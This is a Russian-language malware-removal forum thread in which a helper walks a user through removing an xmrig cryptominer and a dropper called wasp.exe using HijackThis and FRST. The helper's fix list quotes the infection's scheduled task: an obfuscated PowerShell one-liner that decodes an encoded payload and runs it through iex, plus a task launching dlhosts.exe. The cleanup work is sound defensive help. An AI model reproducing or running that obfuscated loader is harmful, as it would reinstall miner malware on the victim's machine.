Недавно обнаружил майнер xmrig и удалил его, но он восстановился и вместе с ним появился wasp.exe. Где 1-ый находится я знаю, а второй спрятался где-то в этой папке.
Недавно обнаружил майнер xmrig и удалил его, но он восстановился и вместе с ним появился wasp.exe. Где 1-ый находится я знаю, а второй спрятался где-то в этой папке.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Pravoslavnyj_Ludoed, спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.Код:O22 - Task: \Microsoft\Windows\DiskCleanup\DiskCleanup - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$smEtQ='v23EQs8z23nLMJYiyyKhV9pZzBGMTcoYnASYSsdfj2WeduYFpWbtLOkRnAGMcasQkRDaC7AkkELBVJ0R1VKlH5IZhByJX6dHuTDDN/w91WGOTbcC5nibFdgug2bsBJVMphWcXr8ViiCaH5AJwCjHJ6RSvyy2MaxX1lLNJqdJwkSXX9ZTgBOOFYVephWcXr8ViiKNAecM+malKbZD6WGYFJ1IqHycSMNZiDvZDZQNnzGdBIcijRSBAo0TnDfVd+sM+HGjJ+5PrROdZsQHnA6RX6l1mFveAsYAmh+QCdVUmEvMAuEZtDaKPctl71acE4gP4m6dSdFG3nb8XNwQmwDGI5wRnAWbM4cUjTHVY7cE7ne4K8cygROMcehOug+LFOhyjT3ASq4Chx2qEZsV3kS7BOAA53XQO+Jl7CmWApIF72nYMoEOjnD1T7EtxiOcAo0RhSKNEYwVmiLVY/kQpVP9d84EixCXevYFqhSXB+xt0UnTWcYijRGMJIc1hhTAWbtAqTrceqcirTOSVpIU9XXaSMMUnD3DCJYWtVSLFMhdhhXIQ9hCwXHVYrtdzHHsLs4AlgSXeaVNtAmLC+B1lEDLUMU9iQiBHZ0dyETTVPgDtEmLZ/5p9WOkO5UB+HWlW8IcmGawOpUDnBi1StIChwWGFMBDjT3bSucB/3zFOaYSkQ7QT+gBjQi4WLdF00jeA9lZwVnBS4EWwFSbQbJE5XfYIKV7v26TS8VCon6XDNpGh3D0Ep0ZzBqCW9VSxgSDUtMNzGuVLKgI/2DoObNO3AqSO+wOyE6VCv0/kF3eGcpLzALVK7sJmwSNHbwn7GbWROliyWGIFZ0T+EDCW7sPn3TsBNBGiRTBS8wCxjGEHIcHqX+FftgF733qZv8VxUSedekTnFvBEKNVigWIMY8VhgTVVJ0R01SaA+JUrWDWVOl0yWGKEJcO/3jQSMNZmXGlRYoRmF67BIkEnQOrH4wV02OXOdEJ5WDFJ/8F2E2WcaVTyVLMGeh4kBSHVJpNjBWLUMAruwmbBPcEp1GXffpl6XCkWsIm/nKVI5kOnyOsMowQgR6PWMAejQfFH4oajWmFMdkZ+GD9brIot06rYPcFmA23B+xknBLSVJoDmF6vFZwijQOYH/wa7EGMYelh9izQSdFO3niZBawSv3v8SdFLwVDAVIkUw1KdSYEFgmWafqhJsGnxZbRB1Q6XYKVEi0meB/VpjR3eAtUruwmbBI0dxiSNCOZHzHybfOhp9WOkWsI12FvAT78YjkbsE5EMj1jMAsFLzBHVWMwC1S6DP/kQ533sK75B2kzKPaw7yT3eRuI9yVuTFsBUiVDFFZlQ2VmTVP1UoXuda6wk6V/IPdFA8D23FIxQqWHqCJYFlRWEA40ZjljMEchdjXvRJqMbr2ylIb5a0C6dY6gvmwqAAfkgqhmJBI0dxiSAAo0RjBmGF7wk/Gada6Qk73aMBdRE/kbJPNQmiHD+PNwawVnGM4QfmxXAWdMZjiLVaaMbr3ulIaxDhQWUZ+Ab3Q/YQLwihB2fHJsVkxWQGZwNzB/VVP1H+meaYPhy8mqeSMhMrEarGIsJn3i2LJkWgC3SSqUZhljdQNhAxCrVfqQs7nr/d/RI0VvcZvZdnQWGQqVbqhmJBI0dxiSNCJxerR6LH/YA53WlKbZVz0LBTr8F+F+BFZ0O0jH3SNFCwFSBW8pGgwXdCZo7jzKWM6Nbr2brPscUigmlLr8ligOEEuhEmBSbI5wCgR6PWLMzhx6eFeAd1CjCR+NC+necVswz+G+RD59V3mfrSNFZzALVK7sJmwSNHcY+jX7fRu8C2XHpdvkSjD3CLsYSnAGRB6UkmATRUs4B1VLDVJoDwUvMArwo5X6XZM1172urBZwJ/nibFcVZnHT0Ep1ZzALGJZsVmjGPFYYE1S6EcLFE+TrocfMZgV3cZL5Ei06iB/lSnBOKH4YDjVjBDKcFnF2mBf4Fsg==';&('iQooeQoox'-replace'Qoo')('$d=([regex]::Matches(''pkyJpQGJocmbv9WUpJHdTdyKnQXZH5COGRVV6oTXn5Wav9WUk92Yv9WUuVkL0h3bvFVZU5SblR3bvF1c592bRN1WngCev9WUl92bRlGKgg3bvFVZv9WUptTKyVmYtVnbsFWayV2UuomYvRCIrAyJgcCIrACblR2bN5iai9GJoASKpEFdF12ckgyZulmc092bRNFNv9WU2U2ch92bRJUbv92bRJnR6oTX0JXZ252bD5SblR3c5N1WoAyYv9WUlRGI9ACZksjclJWb15Gbhl2bvFlclNFIswWZv9WUk9WTgQ3Yl92bRxWZzBCfg03JwUkVJJFRMF0bvF1QJNVWIBFXuwFXnAScl1CIElUZv9WUjlmdlRkLfRyegUmcv9WUlh2dgwHIlZXav9WUyR2av9WUzlGZfJzMv9WUul2bvF1dgkWb3dGI9Aiai92bR9GJ9tjYjRCIuJ3bvFVd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicv92bRhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicv92bRhnYtASKyUTMgI3bi1CIzRCIk52bvFVYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicv92bRZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzV2bvFFd5JEdv9WUldkL4YEVVpjOddmbv9WUpR2bj5WRuQ3bvFFelRlLtV2bvFFdzl3UbBSPgI2bvFFcksXKzN3bvFVYwRSXn5Way92bRR3cbBCLi92bRNGJd11WlR3bvFVeitFKjV2bvFFZg42bpR3Yv9WUuVnZ'',''.'',''RiQooghQootTQoooLQooeft'')|FoQoorEaQooch {$Qoo_Qoo.valQooue}) -jQooo'+'in '''';$d=[TeQooxt.EncoQooding]::UTQooF'+2*2*2+'.GeQootString([ConQoovert]::Fro'+'mQooB'+'ase'+8*8+'StriQoong($Qood));&(''iQooeQoox'')($d -repQoolace''QQoooo'');'-replace'Qoo')" O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\WINDOWS\system32\cmd.exe /c dlhosts.exe || dlchosts.exe
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
Вот.
Выделите и скопируйте в буфер обмена следующий код:Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.Код:Start:: CreateRestorePoint: HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ GroupPolicy: Ограничение ? <==== ВНИМАНИЕ GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ Task: {4134951F-7D2C-4812-8B30-6C3E099A1101} - \Microsoft\Windows\UNP\RunCampaignManager -> Нет файла <==== ВНИМАНИЕ Folder: C:\ProgramData\Windows ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Нет файла AlternateDataStreams: C:\ProgramData\TEMP:D8999815 [200] FirewallRules: [UDP Query User{43194CE7-08F4-4D35-B012-9F9499604657}I:\sdi_rus\sdi_x64_r1909.exe] => (Block) I:\sdi_rus\sdi_x64_r1909.exe => Нет файла FirewallRules: [TCP Query User{0020382B-4DF1-4414-9274-523949CC8D19}I:\sdi_rus\sdi_x64_r1909.exe] => (Block) I:\sdi_rus\sdi_x64_r1909.exe => Нет файла Reboot: End::
Компьютер будет перезагружен автоматически.
Сообщите, что с проблемой.
WBR,
Vadim
Вроде решена.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
WBR,
Vadim
Ваши права в разделе
Ответить с цитированием
